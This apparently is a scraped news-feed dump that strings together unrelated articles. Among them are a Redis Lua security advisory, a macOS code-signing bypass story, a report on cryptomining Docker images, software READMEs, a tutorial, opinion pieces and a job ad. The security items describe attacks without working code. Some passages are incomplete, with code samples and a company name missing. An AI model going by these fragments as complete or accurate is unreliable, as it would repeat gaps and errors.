3. From the point of view of the Redis user, it is important that when some untrusted data is sent to the Lua engine, an HMAC is used in order to ensure that the data was not modified. For instance there is a popular pattern where the state of an user is stored in the user cookie itself, to be later decoded. Such data may later be used as input for Redis Lua functions. This is an example where an HMAC is absolutely needed in order to make sure that we read what we previously stored.

4. More Lua sandboxing. There should be plenty of literature and good practices about this topic. We already have some sandboxing implemented, but my feeling from my security days, is that sandboxing is ultimately always a mouse and cat game, and can never be executed in a perfect way. CPU / memory abuses for example may be too complex to track for the goals of Redis. However we should at least be sure that violations may result in a “graceful” abort without any memory content violation issue.

5. Maybe it’s time to upgrade the Lua engine? I’m not sure if newer versions of Lua are more advanced from the point of view of security, however we have the huge problem that upgrading Lua will result in old script potentially no longer working. A very big issue for the Redis community, especially since, for the kind of scripts Redis users normally develop, a more advanced Lua version is only marginally useful.

# The issues

The problems fixed are listed in the following commits:

ce17f76b Security: fix redis-cli buffer overflow.
e89086e0 Security: fix Lua struct package offset handling.
5ccb6f7a Security: more cmsgpack fixes by @soloestoy.
1eb08bcd Security: update Lua struct package for security.
52a00201 Security: fix Lua cmsgpack library stack overflow.

The first commit is unrelated to this effort, and is a redis-cli buffer overflow that can be exploited only passing a long host argument in the command line. The other issues are the problems that we found on cmsgpack and the struct package.

The two scripts to reproduce the issues are the following:

https://gist.github.com/antirez/82445fcbea6d9b19f97014cc6cc79f8a

and

https://gist.github.com/antirez/bca0ad7a9c60c72e9600c7f720e9d035

Both authored by the Apple Information Security team. However the first was modified by me in order to make it more reliably causing the crash.

# Versions affected

Basically every Redis with Lua scripting is affected.

The fixes are available as the following Github tags:

3.2.12
4.0.10
5.0-rc2

The stable release (4.0.10) is also available at http://download.redis.io as usually.

Releases tarball hashes are available here:

https://github.com/antirez/redis-hashes

Please note that the versions released also include different other bugfixes, so it’s a good idea to also read the release notes to know what other things you are upgrading by switching to the new version.

I hope to be back with a blog post in the future with the report of the security auditing that is planned for the Lua scripting subsystem in Redis.

Tensorflow.js – A Practical Guide

$
0
0

Let’s start with a simple example: building a neural network for logic gate XOR.

The XOR problem

XOR is a good example of feed forward neural network.

Truth table of XOR

From the truth table, we see that the output is 0 when both inputs are 0 or 1, else it is 1. Our neural network will learn to predict the output when A and B are given.

Basic setup

Create a new file named index.html, copy, and paste the code given below.

That’s it! We’re done with TensorFlow setup, we don’t need to do anything more.

Easy, right?

In TensorFlow.js, there are two ways to create models. We’ll be using high level APIs to construct models out of layers.

Step — 1 Creating dataset

We’ll create a dataset where the set of values in A and B will serve as training sample(x_train)and values in A XOR B will serve as training sample(y_train).

Step — 2 Creating a model

We’ll create two dense layers with two non-linear activation functions. We’ll use stochastic gradient method with binary cross entropy as our loss function.

Step — 3 Train the model

Training the model will be an asynchronous operation, so we need to wait before model.fit().

Step — 4 Test your model

Next step is to test our model. In our case training and test set will be same i.e x_train.

We’ll get an output like this:

[[0.0064339], [0.9836861], [0.9835356], [0.0208658]]
Voila!

We have created a simple neural network and trained it in the browser. With machine learning coming to client side the data never leaves client and all the training and inference happens in client side. Cut down on time, costs and keep control of your machine learning algorithm straight from your browsers.

What are some algorithms you are looking to use tensorflow.js? Tell us in comments below or join the YellowAnt community. Sign up for YellowAnt here.

Netflix and Alphabet will need to become ISPs, fast

$
0
0

This week completely scrambled the video landscape, and its implications are going to take months to fully understand.

First is the district court’s decision to approve the merger of and Time Warner announced just moments ago. That will create one of the largest content creation and distribution companies in the world when it closes. It is also expected to encourage Comcast to make a similar bid for 21st Century Fox, further consolidating the market. As Chip Pickering, CEO of pro-competition advocacy org INCOMPAS put it, “AT&T is getting the merger no one wants, but everyone will pay for.”

But the second major story was the final (final final) repeal of the FCC’s net neutrality rules yesterday that will allow telecom companies like AT&T to prioritize their own content over that of competitors. In the past, AT&T didn’t have all that much content, but the addition of Time Warner now gives them a library encompassing Warner Bros. to TBS, TNT, HBO and CNN. Suddenly, that control over prioritization just got a lot more powerful and profitable.

The combination of these two stories is spooking every video on demand service, from YouTube to . If Comcast bids and is successful in buying 21st Century Fox, then connectivity in the United States will be made up of a handful of gigantic content library ISPs, and a few software players that will have to pay a premium to deliver their content to their own subscribers. While companies like Netflix and have negotiated with the ISPs for years, the combination of these two news stories puts them in a significantly weaker negotiating position going forward.

While consumers still have some level of power — ultimately, ISPs want to deliver the content that their consumers want — a slow degrading of the experience for YouTube or Netflix could be enough to move consumers to “preferred” content. Some have even called this the start of the “cable-ification” of the internet. AT&T, for instance, has wasted no time in creating prioritized fast lanes.

That world is not automatic though, because Alphabet, Netflix and other video streaming services have options on how to respond.

For Alphabet, that will likely mean a redoubling of its commitment to Google Fiber. That service has been trumpeted since its debut, but has faced cutbacks in recent years in order to scale back its original ambitions. That has meant that cities like Atlanta, which have held out for the promise of cheap and reliable gigabit bandwidth, have been left in something of a lurch.

Ultimately, Alphabet’s strategic advantage against Comcast, AT&T and other massive ISPs is going to rest on a sort of mutually assured destruction. If Comcast throttles YouTube, then Alphabet can propose launching in a critical (read: lucrative) Comcast market. Further investment in Fiber, Project Fi or perhaps a 5G-centered wireless strategy will be required to give it to the leverage to bring those negotiations to a better outcome.

For Netflix, it is going to have to get into the connectivity game one way or the other. Contracts with carriers like Comcast and AT&T are going to be more challenging to negotiate in light of today’s ruling and the additional power they have over throttling. Netflix does have some must-see shows, which gives it a bit of leverage, but so do the ISPs. They are going to have to do an end-run around the distributors to give them similar leverage to what Alphabet has up its sleeve.

One interesting dynamic I could see forthcoming would be Alphabet creating strategic partnerships with companies like Netflix, Twitch and others to negotiate as a collective against ISPs. While all these services are at some level competitors, they also face an existential threat from these new, vertically merged ISPs. That might be the best of all worlds given the shit sandwich we have all been handed this week.

One sad note though is how much the world of video is increasingly closed to startups. When companies like Netflix, which today closed with a market cap of almost $158 billion, can’t necessarily get enough negotiating power to ensure that consumers have direct access to them, no startup can ever hope to compete. America may believe in its entrepreneurs, but its competition laws have done nothing to keep the terrain open for them. Those implications are just beginning.

Show HN: Bistro Streams – A light-weight column-oriented stream analytics server

$
0
0

README.md

  ____  _     _
 | __ )(_)___| |_ _ __ ___  ___________________________
 |  _ \| / __| __| '__/ _ \ 
 | |_) | \__ \ |_| | | (_) |  C O L U M N S  F I R S T
 |____/|_|___/\__|_|  \___/ ___________________________

Gitter chatMaven Central


Bistro Streams does for stream analytics what column stores did for databases


What is Bistro Streams: a stream analytics server

Bistro Streams is a light-weight column-oriented stream analytics server which radically changes the way stream data is processed. It is a general-purpose server which is not limited by in-stream analytics but can also be applied to batch processing including such tasks as data integration, data migration, extract-transform-load (ETL) or big data processing. Yet, currently its implemented features are more focused on stream analytics with applications in IoT and edge computing.

Bistro Streams defines its data processing logic using column definitions as opposed to the existing approaches which process data using set operations. In particular, it does not use such difficult to comprehend and execute operations like join and group-by. More about the column-oriented approach to data processing can be found here:

How it works: a novel approach to stream processing

Internally, Bistro Streams is simply a database consisting of a number of tables and columns. These tables and columns may have their own definitions and it is precisely how data is being processed in the system. In other words, instead of continuously evaluating queries, Bistro Streams evaluates column and table definitions by deriving new data from the existing data. The unique distinguishing feature of Bistro Streams is how it processes data: it relies on the mechanism of evaluating column and table definitions by deriving their outputs and population, respectively, as opposed to executing set-oriented queries in traditional systems.

The main purpose of of Bistro Streams server is to organize interactions of this internal database (Bistro Engine) with the outside world. In particular, the server provides functions for feeding data into the database and reading data from the database. These functions are implemented by connectors which know how to interact with the outside data sources and how to interact with the internal data engine. Thus the internal database is unaware of who and why changes its state - this role is implemented by connectors in the server. On the other hand, Bistro Streams server is unaware of how this data state is managed and how new data is derived - it is the task of Bistro Engine.

Bistro Streams consists of the following components:

  • A schema instance is a database (Bistro Engine) storing the current data state. Yet, it does not have any threads and is not able to do any operations itself - it exposes only native Java interface.
  • A server instance (Bistro Streams) provides one or more threads and ability to change the data state. The server knows how to work with the data and its threads are intended for working exclusively with the data state. Yet, the server does not know what to do, that is, it does not have any sources of data and any sources of commands to be executed.
  • Actions describe commands or operations with data which are submitted to the server by external threads (in the same virtual machine) and are then executed by the server. Internally, actions are implemented in terms of the Bistro Engine API.
  • A task is simply a sequence of actions. Tasks are used if we want to execute several actions sequentially.
  • A connector is essentially an arbitrary process which runs in the same virtual machine. Its task is to connect the server with the outside world. On one hand, it knows something about the outside world, for example, how to receive notifications from an event hub using a certain protocol. On the other hand, it knows how to work with the server by submitting actions. Thus connectors are intended for streaming data between Bistro Streams and other systems or for moving data into and out of Bistro Streams. A connector can also simulate events, for example, a timer is an example of a typical and very useful connector which regularly produces some actions like evaluating the database or printing its state.

Why Bistro Streams: benefits

Here are some benefits and unique features of Bistro Streams:

  • Bistro Streams is a light-weight server and therefore very suitable for running on edge devices. It is estimated that dozens billions connected things will come online by 2020 and analytics at the edge is becoming the cornerstone of any successful IoT solution. Bistro Streams is able to produce results and make intelligent decisions immediately at the edge of the network or directly on device as opposed to cloud computing where data is transmitted to a centralized server for analysis. In other words, Bistro Streams is intended to analyze data as it is being created by producing results immediately as close to the data source as possible.
  • Bistro Streams is based on a general-purpose data processing engine which supports arbitrary operations starting from simple filters and ending with artificial intelligence and data mining.
  • Bistro Streams is easily configurable and adaptable to various environments and tasks. It separates the logic of interaction with the outside world and the logic of data processing. It is easy to implement a custom connector to interacte with specific devices or data sources, and it is also easy to implement custom actions to interact with the internal data processing engine.
  • Bistro Streams is based on a novel data processing paradigm which is conceptually simpler and easier to use than conventional approaches to data processing based on SQL-like languages or MapReduce. It is easier to define new columns rather than write complex queries using joins and group-by which can be difficult to understand, execute and maintain.
  • Bistro Streams is very efficient in deriving new data (query execution in classical systems) from small incremental updates (typically when new events are received). It maintains dirty state for each column and table, and knows how to propagate these changes to other elements of the database by updating their state incrementally via inference. In other words, if 10 events have been appended to and 5 events deleted from an event table with 1 million records, then the system will process only these 15 records and not the whole table.

Creating a schema

First, we need to create a database where all data will be stored and which will execute all operations. For example, we could create one table which has one column:

Schema schema =newSchema("My Schema");Table table = schema.createTable("EVENTS");Column column = schema.createColumn("Temperature", table);

Creating a server

A server instance is created by passing the schema object to its constructor as a parameter:

Server server =newServer(schema);

The server will be responsible for executing all operations on the data state managed by Bistro Engine. In particular, it is resonsible for making all operations safe including thread-safety. After starting the server, we should not access the schema directly using its API because it is responsibility of the server and the server provides its own API for working with data:

Now the server is waiting for incoming actions to be executed.

Actions

An action represents one user-defined operation with data. Actions are submitted to the server and one action will be executed within one thread. There are a number of standard actions which implement conventional operations like adding or removing data elements.

For example, we could create a record, and then add it to the table via such an action object:

Map<Column, Object> record =newHashMap<>();
record.put(column, 36.6);Action action =newActionAdd(table, record);
server.submit(action);

The server stores the submitted actions in the queue and then decides when and how to execute them.

If we want to execute a sequence of operations then they have to be defined as a task. For example, we might want to delete unnecessary records after adding each new record:

Action action1 =newActionAdd(table, record);Action action2 =newActionRemove(table, 10);Task task =newTask(Arrays.asList(action1, action2), null);

server.submit(task);

This will guarantee that the table will have maximum 10 records and older records will be deleted by the second action. In fact, it is an example how retention policy can be implemented.

More complex actions can be defined via user-defined functions:

server.submit(
        x ->System.out.println("Number of records: "+ table.getLength())
);

The server will execute this action and print the current number of records in the table.

Connectors

The server instance is not visible from outside - it exposes only its action submission API within JVM. The server itself knows only how to execute actions while and receiving or sending data is performed by connectors. A connector is supposed to have its own thread in order to be able to asynchronously interact with the outside world.

In fact, Bistro does not restrict what connectors can do - it is important only that the decouple the logic of interaction with external processes from the internal logic of action processing. In particular, connectors are used for the following scenarios:

  • Batch processing. Such a connector will simply load the whole or some part of the input data set into the server. It can do it after receiving certain event or automatically after start.
  • Stream processing. Such a connector will create a listener for certain event types (for example, by subscribing to a Kafka topic) and then submit an action after receiving new events. Its logic can be more complicated. For example, it can maintain an internal buffer in order to wait for late events and then submit them in batches. Or, it can do some pre-processing like filtering or enrichment (of course, this could be also done by Bistro Engine).
  • Timers. Timers are used for performing regular actions like sending output, checking the state of some external processes, evaluating the data state by deriving new data, or implementing some custom retention policy (deleting unnecessary data).
  • Connectors are also supposed to sink data to external event hubs or data stores. For example, in the case some unusual behavior has been detected by the system (during evaluation) such a connector can append a record to a database or sent an alert to an event hub.
  • A connector can also implement a protocol for accessing data stored in the server like JDBC. External clients can then connect to the server via JDBC and visually explore its current data state.

In our example, we can use a standard timer to simulate a data source by regularly adding random data to the table:

ConnectorTimer timer =newConnectorTimer(server,500); // Do something every 500 milliseconds
timer.addAction(
        x -> {long id = table.add();double value =ThreadLocalRandom.current().nextDouble(30.0, 40.0);
            column.setValue(id, value);
        }
);

After adding each new record, we want to evaluate the schema by deriving new data:

timer.addAction(newActionEval(schema));

(In our example it will do nothing because we do not have derived columns with their custom definitions.)

Once a connector has been configured it has to be started.

From the project folder (git/bistro/server) execute the following to clean, build and publish the artifact:

$ gradlew clean
$ gradlew build
$ gradlew publish

The artifact will be placed in your local repository from where it will be available in other projects.

In order to include this artifact into your project add the following lines to dependencies of your build.gradle:

dependencies {
    compile("org.conceptoriented:bistro-core:0.8.0")
    compile("org.conceptoriented:bistro-server:0.8.0")// Other dependencies
}

Ask HN: How to find a mental health professional?

$
0
0
Ask HN: How to find a mental health professional?
112 points by throwaway-186133 hours ago | hide | past | web | favorite | 58 comments
We've been having a lot of great discussions here on HN lately about mental health, and the suggestion to seek professional help rings true.

But, depressed and burnt out and feeling isolated, the project of even finding a therapist in the first place can be overwhelming.

I live in a large city, where there are literally thousands of therapists, psychologists, psychiatrists, licensed social workers, life coaches, you name it. About half of them even accept my insurance.

How does one even begin to narrow the options down? After asking my GP and getting no suggestions, I'm at a complete loss.


Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact

Fixing Weak Wi-Fi Security

$
0
0

Even if your router still appears to work properly, the device has reached the end of its life when manufacturers stop supporting it with firmware updates, leaving it vulnerable to future cyberthreats. You can expect this to happen every three to five years. At that point, it is crucial to upgrade to a new piece of hardware.

The best way to check is to look up your router on the manufacturer’s website and read notes about its firmware releases. If there hasn’t been a firmware update in the last year, the router has probably been discontinued.

Among the routers affected by the VPNFilter malware, a significant portion of them were more than five years old, said Cisco’s Mr. Watchinski.

How did we get here in the first place? Historically, manufacturers have designed routers by cobbling together open-source software platforms with commodity components to produce base stations as cheaply as possible — with little care for long-term security, Mr. Fraser said.

“It is a miserable situation, and it has been from day one,” he said. But Mr. Fraser added that there were now “new world” routers with operating systems, tougher security and thoughtful features to make network management easy.

If it is time to update your router, rid yourself of some of these headaches by looking for a smarter router. Check for Wi-Fi systems that offer automatic updates to spare you the headache of having to check and download updates periodically. Many modern Wi-Fi systems include automatic updates as a feature. My favorite ones are Eero and Google Wifi, which can easily be set up through smartphone apps.

The caveat is that smarter Wi-Fi systems tend to cost more than cheap routers that people are accustomed to. Eero’s base stations start at $199, and a Google Wifi station costs $119, compared with $50 for a cheap router. For both of these systems, you can also add base stations throughout the home to extend their wireless connections, creating a so-called mesh network.

Another bonus? Mr. Fraser noted that more modern Wi-Fi systems should have longer life spans because the companies sometimes relied on different revenue streams, like selling subscriptions to network security services.

For almost 11 yrs, hackers could easily bypass 3rd-party macOS signature checks

$
0
0
Enlarge/ The Little Snitch firewall was one of at least eight third-party Mac security tools affected by a code-signing bypass.

For almost 11 years, hackers have had an easy way to get macOS malware past the scrutiny of a host of third-party security tools by tricking them into believing the malicious wares were signed by Apple, researchers said Tuesday.

Digital signatures are a core security function for all modern operating systems. The cryptographically generated signatures make it possible for users to know with complete certainty that an app was digitally signed with the private key of a trusted party. But, according to the researchers, the mechanism many macOS security tools have used since 2007 to check digital signatures has been trivial to bypass. As a result, it has been possible for anyone to pass off malicious code as an app that was signed with the key Apple uses to sign its apps.

The technique worked using a binary format, alternatively known as a Fat or Universal file, that contained several files that were written for different CPUs used in Macs over the years, such as i386, x86_64, or PPC. Only the first so-called Mach-O file in the bundle had to be signed by Apple. At least eight third-party tools would show other non-signed executable code included in the same bundle as being signed by Apple, too. Affected third-party tools included VirusTotal, Google Santa, Facebook OSQuery, the Little Snitch Firewall, Yelp, OSXCollector, Carbon Black’s db Response, and several tools from Objective-See. Many companies and individuals rely on some of the tools to help implement whitelisting processes that permit only approved applications to be installed on a computer, while forbidding all others.

The Stuxnet worm that targeted Iran’s uranium enrichment program eight years ago relied on digital signatures belonging to legitimate software developers. Last year, researchers said fraudulent code-signing was more widespread than previously thought and predated Stuxnet by about seven years. Most of those attacks involved obtaining Microsoft Windows-trusted signing certificates belonging to legitimate developers. The Apple forgery, by contrast, required no such certificate theft.

“It’s really easy,” Joshua Pitts, a senior penetration testing engineer at security firm Okta, said of the technique. When he discovered it in February, he quickly contacted Apple and the third-party developers. “This really scared the bejeebus out of me, so we went right to disclosure mode.”

Pitts said tools built into macOS weren’t susceptible to the bypass, which has been possible since the release of OS X Leopard in 2007. Okta has published more about the bypass here. The post demonstrated how the bypass caused the affected tools to show that a file named ncat.frankenstein was signed by Apple, even though it wasn't.

This is not the first time researchers have found a way to bypass signature checks in third-party tools. In 2015, for instance, a researcher published this hack subverting whitelisting in Google Santa. Patrick Wardle, the developer of the Objective-See tools and Chief Research Officer at Digita Security, said third-party tools including his own can almost always be bypassed when hackers directly or proactively target them.

“If a hacker wants to bypass your tool and targets it directly, they will win,” Wardle said. He went on to say that the bypass was the result of ambiguous documentation and comments Apple provided for using publicly available programming interfaces that make the signature checks work.

“To be clear, this is not a vulnerability or bug in Apple’s code... basically just unclear/confusing documentation that led to people using their API incorrectly,” Wardle told Ars. “Apple updated [its] documents to be more clear, and third-party developers just have to invoke the API with a more comprehensive flag (that was always available).”

Recovery of Lost Indigenous Languages by Optical Scanning of Old Wax Cylinders

$
0
0

In an 1878 North American Review description of his new invention, the phonograph, which transcribed sound on wax-covered metal cylinders, Thomas Edison suggested a number of possible uses: “Letter writing and all kinds of dictation without the aid of a stenographer,” “Phonographic books” for the blind, “the teaching of elocution,” and, of course, “Reproduction of music.” He did not, visionary though he was, conceive of one extraordinary use to which wax cylinders might be put—the recovery or reconstruction of extinct and endangered indigenous languages and cultures in California.

And yet, 140 years after Edison’s invention, this may be the most culturally significant use of the wax cylinder to date. “Among the thousands of wax cylinders” at UC Berkeley’s Phoebe A. Hearst Museum of Anthropology, writes Hyperallergic’s Allison Meier, “are songs and spoken-word recordings in 78 indigenous languages of California. Some of these languages, recorded between 1900 and 1938, no longer have living speakers.”




Such is the case with Yahi, a language spoken by a man called “Ishi,” who was supposedly the last surviving member of his culture when anthropologist Alfred Kroeber met him in 1911. Kroeber recorded nearly 6 hours of Ishi’s speech on 148 wax cylinders, many of which are now badly degraded.

“The existing versions” of these artifacts “sound terrible,” says Berkeley linguist Andrew Garrett in the National Science Foundation video at the top, but through digital reconstruction much of this rare audio can be restored. Garrett describes the project—supported jointly by the NSF and NEH—as a “digital repatriation of cultural heritage.” Using an optical scanning technique, scientists can recover data from these fragile materials without further damaging them. You can see audio preservationist Carl Haber describe the advanced methods above.

The project represents a scientific breakthrough and also a stark reminder of the genocide and humiliation of indigenous people in the American west. When he was found, “starving, disoriented and separated from his tribe,” writes Jessica Jimenez at The Daily Californian, Ishi was “believed to be the last Yahi man in existence because of the Three Knolls Massacre in 1866, in which the entire Yahi tribe was thought to have been slaughtered.” (According to another Berkeley scholar his story may be more complicated.) He was “put on display at the museum, where outsiders could watch him make arrows and describe aspects of Yahi culture.” He never revealed his name (“Ishi” means “man”) and died of tuberculosis in 1916.

The wax cylinders will allow scholars to recover other languages, stories, and songs from peoples destroyed or decimated by the 19th century “Indian Wars.” Between 1900 and 1940, Kroeber and his colleagues recorded “Native Californians from many regions and cultures,” the Berkeley project page explains, “speaking and singing; reciting histories, narratives and prayers, listing names for places and objects among many other things, all in a wide variety of languages. Many of the languages recorded on the cylinders have transformed, fallen out of use, or are no longer spoken at all, making this collection a unique and invaluable resource for linguists and contemporary community members hoping to learn about or revitalize languages, or retrieve important piece of cultural heritage.”

via Hyperallergic

Related Content:

Download 10,000 of the First Recordings of Music Ever Made, Courtesy of the UCSB Cylinder Audio Archive

Interactive Map Shows the Seizure of Over 1.5 Billion Acres of Native American Land Between 1776 and 1887

1,000+ Haunting & Beautiful Photos of Native American Peoples, Shot by the Ethnographer Edward S. Curtis (Circa 1905)

Josh Jones is a writer and musician based in Durham, NC. Follow him at @jdmagness



Elph wants to be the “Netscape for crypto”

$
0
0

Three-month-old Elph wants to make it easier for you to find and use blockchain-based apps. How? Through a portal that’s promising to enable users to click through to see how their crypto holdings are faring, to buy and sell CryptoKitties or to find and use other decentralized apps.

Its co-founder and CEO, Ritik Malhotra, says it will eventually be the “Netscape for crypto.”

If it sounds outlandish, that’s partly because there are still so few blockchain apps from which to choose. Malhotra and team trust that this will change over time, however, and investors seem to trust them, including The House Fund and numerous individual investors who just provided the company with a little less than a million dollars in pre-seed funding.

A large part of the appeal is the founders’ pedigree. Malhotra was a Thiel fellow, for example, stepping away from UC Berkeley in order to make the requisite two-year commitment demanded of the prestigious program. Malhotra and Tanooj Luthra, co-founder and CTO, had also previously co-founded and led a YC-backed startup, Streem, that sold to Box in 2014. Afterward, Luthra joined Coinbase as a senior engineer on Coinbase’s crypto team, learning the ins and outs of the nascent but fast-growing industry.

But the company’s premise is compelling, too. Most crypto outfits today require users to walk through numerous manual steps to create and store their wallet, and authenticate that they are who they say before they can start actively engaging with the service. With Elph, users simply sign up with an email and password, says Malhotra; Elph then handles account management across apps based on the unique ID that it assigns them.

“It’s an app store,” explains Luthra. “You log in, you see a bunch of decentralized apps, you click them and they open up. We’ve handled all the interfacing with the blockchain and done the heavy lifting in the background for you.”

These decentralized app developers don’t need to buy into Elph’s vision; they all respond to open web3 protocols that allow them to interact with the Ethereum blockchain and Ethereum smart contracts. Elph has been able to implement the web3 APIs in its app, meaning everyone is talking the same language.

Elph is also working on a developer SDK to make it even easier for developers to build blockchain-based apps.

Malhotra and Luthra seem to be carving their careers out of abstracting away the complexity of highly technical things. Streem built desktop software for cloud storage services, for example, enabling customers to stream files to their desktop environments. (Notably, it also raised just $875,000 from investors to build out its product.) More recently, while working at Coinbase, Luthra realized he was witnessing “this huge boom of new, decentralized apps coming out that are hard for anyone to access or use who isn’t fairly technical.” It’s “kind of like the internet in 1994 right now,” he says. “So we decided to simplify it.”

The company is opening up its public beta launch today, which you can check out here. Because most users need to be educated about which apps are being built, the portal today allows them to browse apps by category — much like sites like Netscape and Yahoo once did when the internet was still young and its content a confusing morass for web surfers.

The team has plainly paid attention to creating an engaging experience that aims to make finding and using these apps fun. As for how Elph accrues value for itself and its investors, the idea is to employ token mechanics, meaning that new features will be added over time by “maintainers” or people who work on the app store to either jazz it up or else rank apps for Elph and receive tokens as rewards in exchange for their efforts. (These tokens, presumably, will be available to trade over time on cryptocurrency exchanges that are easily accessed through . . . Elph.)

Elph isn’t the only outfit to identify this same opportunity. Coinbase, for example, last year rolled out Toshi, a browser for the Ethereum network that aims to provide universal access to financial services.

Still, it’s early days, obviously, and momentum appears to be building slowly. Today, there are roughly 3,000 decentralized apps up and running, roughly four times more than there were a year ago. Some day, believes Malhotra, there will be millions.

If Malhotra and Luthra play their cards right, Elph may help you find them.

Show HN: Node-android – Run Node.js on Android

$
0
0

README.md

Run Node.js on Android by rewrite Node.js in Java with the compatible API.

third-party: libuvpp, libuv-java JNI code by Oracle.

Build

Clone the code, open Android Studio (1.*) and import the project.

For Eclipse ADT user, refer to https://github.com/InstantWebP2P/node-android/tree/adt

Javascript code injection

> adb shell am start -a android.intent.action.VIEW -n com.iwebpp.nodeandroid/.MainActivity -e js "var run = function () { return 'hello world'; } run();"

Features

JS runtime

  • Rhino supported
  • Exposed node-android packages: com.iwebpp.node.http, com.iwebpp.node.stream, com.iwebpp.node.net, etc
  • Exposed node-android classes: com.iwebpp.node.EventEmitter2, com.iwebpp.node.Dns, com.iwebpp.node.Url, etc
  • Exposed node-android native context in JS standard scope as NodeCurrentContext alias NCC
  • Exposed Android API: android.util.Log
  • NodeJS compatible internal modules are available in JS standard scope
  • Exposed WebSocket classes: com.iwebpp.wspp.WebSocket, com.iwebpp.wspp.WebSocketServer

JS usage

TODO

  • API doc, more demos
  • JS runtime CommonJS/AMD compliance

Support us

  • 远程工作云办公联盟 QQ 群号: 463651269

### License

(see LICENSE file)

Copyright (c) 2014-2017 Tom Zhou(iwebpp@gmail.com)

The End of Video Coding?

$
0
0

In the IEEE Signal Processing Magazine issue November 2006 article “Future of Video Coding and Transmission” Prof. Edward Delp started by asking the panelists “Is video coding dead? Some feel that, with the higher coding efficiency of the H.264/MPEG-4 . . . perhaps there is not much more to do. I must admit that I have heard this compression is dead argument at least four times since I started working in image and video coding in 1976.

People were postulating that video coding was dead more than four decades ago. And yet here we are in 2018, organizing the 33rd edition of Picture Coding Symposium (PCS).

Is image and video coding dead? From the standpoint of application and relevance, video compression is very much alive and kicking and thriving on the internet. The Cisco white paper “The Zettabyte Era: Trends and Analysis (June 2017)” reported that in 2016, IP video traffic accounted for 73% of total IP traffic. This is estimated to go up to 82% by 2021. Sandvine reported in the “Global Internet Phenomena Report, June 2016” that 60% of peak download traffic on fixed access networks in North America was accounted for by four VOD services: Netflix, YouTube, Amazon Video and Hulu. Ericsson’s “Mobility Report November 2017” estimated that for mobile data traffic in 2017, video applications occupied 55% of the traffic. This is expected to increase to 75% by 2023.

As for industry involvement in video coding research, it appears that the area is more active than ever before. The Alliance for Open Media (AOM) was founded in 2015 by leading tech companies to collaborate on an open and royalty-free video codec. The goal of AOM was to develop video coding technology that was efficient, cost-effective, high quality and interoperable, leading to the launch of AV1 this year. In the ITU-T VCEG and ISO/IEC MPEG standardization world, the Joint Video Experts Team (JVET) was formed in October 2017 to develop a new video standard that has capabilities beyond HEVC. The recently-concluded Call for Proposals attracted an impressive number of 32 institutions from industry and academia, with a combined 22 submissions. The new standard, which will be called Versatile Video Coding (VVC), is expected to be finalized by October 2020.

Like many global internet companies, Netflix realizes that advancements in video coding technology are crucial for delivering more engaging video experiences. On one end, many people are constrained by unreliable networks or limited data plans, restricting the video quality that can be delivered with current technology. On the other side of the spectrum, premium video experiences like 4K UHD, 360-degree video and VR, are extremely data-heavy. Video compression gains are necessary to fuel the adoption of these immersive video technologies.

So how will we get to deliver HD quality Stranger Things at 100 kbps for the mobile user in rural Philippines? How will we stream a perfectly crisp 4K-HDR-WCG episode of Chef’s Table without requiring a 25 Mbps broadband connection? Radically new ideas. Collaboration. And forums like the Picture Coding Symposium 2018 where the video coding community can share, learn and introspect.

Influenced by our product roles at Netflix, exposure to the standardization community and industry partnerships, and research collaboration with academic institutions, we share some of our questions and thoughts on the current state of video coding research. These ideas have inspired us as we embarked on organizing the special sessions, keynote speeches and invited talks for PCS 2018.

Smarking (YC W15) Is Hiring Sr. Front End Eng in SF

$
0
0

Smarking is looking for excellent senior frontend engineers to help us scale the initial success of the company to the next level. Ideal candidates will be experienced and passionate about working in an early-stage tech company with initial product-market-fit and growing it into the next stage with rocket speed. As a senior member of our frontend team, you will be responsible for: 1) evolving frontend codebase to efficiently render beautiful, complex, and highly interactive charts; 2) architecting highly customizable and user-dependent features; 3) continuous optimization of performance; 4) improving automation and deployment pipelines. Senior frontend engineers will lead major engineering projects with the highest impact on our business and operations.

Smarking is a fast growing tech company with hyper-driven MIT PhDs, engineers, data scientists, transportation experts, and seasoned business professionals who are working hard to solve the notorious parking problem via a unique angle. By providing the very first enterprise data analytics software (SaaS) to the parking industry, Smarking is establishing itself as the leader in an emerging market of $10 Billion in the US and $40 Billion globally.

Smarking aims to enable highly efficient urban mobility by digitizing parking spaces and distributing parking inventory dynamically, in order to get the world ready for the connected, shared, and autonomous driving future. Backed by a group of top investors such as Y Combinator and Khosla Ventures, Smarking has brought real-time dashboards and predictive analytics to thousands of parking locations for cities (e.g. Miami, Santa Monica), airports(e.g. Boston, San Diego), universities (e.g. MIT), hospitals, parking operators, and garage owners. For the first time, cities and parking operators can make informed decisions for planning, operations, and pricing in real-time with the help of our products.

Our front-end is mostly written in ES6. Our tech stack includes React, Redux, and Flow. We use mocha, chai, enzyme, and selenium for testing. We use webpack for packaging, and docker for containerization. And we're constantly trying new tools and practices to be the best we can.

SOUNDS LIKE A FIT?

We would love to work with driven engineers to learn from each other and grow together. If Smarking sounds like a good fit for you, please apply. We look forward to hearing from you!

How the modern containerization trend is exploited by attackers

$
0
0

Kromtech Security Center found 17 malicious docker images stored on Docker Hub for an entire year. Even after several complaints on GitHub and Twitter, research made by sysdig.com and fortinet.com, cybercriminals continued to enlarge their malware armory on Docker Hub. With more than 5 million pulls, the docker123321 registry is considered a springboard for cryptomining containers. Today’s growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero. By pushing malicious images to a Docker Hub registry and pulling it from the victim’s system, hackers were able to mine 544.74 Monero, which is equal to $90000.

Here is the timeline:

Timeline of malicious docker123321 registry lifecycle

Figure 1. Timeline of malicious docker123321 registry lifecycle.

Kubernetes clusters that were deployed for educational purposes or for tests with lack of security requirements represent a great threat for its owners. Even an experienced engineer could care less or even forget about that part of the infrastructure after tests.

Background

Palo Alto Networks post:

Attackers have traditionally profited by stealing identities or credit card numbers and then selling them on underground markets. According to Verizon Data Breach Investigations Reports, the price for stolen records has fallen, so cyber attackers are on the hunt for new ways to boost their profits. Thanks to advances in attack distribution, anonymous payments, and the ability to reliably encrypt and decrypt data, ransomware is on a tear.

With the increase in prices for cryptocurrency trendsetter and several of its altcoins, the number of cryptocurrency-mining malware incidents grew respectively. Cybercriminals have been running cryptocurrency attacks on hijacked machines for some time, finding it more profitable than ransomware. Now, however, malware authors have found a new way to take their nefarious actions into the cloud and bypass the need for hijacking individual computers. The purpose of hackers hunting for poorly configured cloud-native environments is to mine cryptocurrency using large computational power.

Why did we do this?

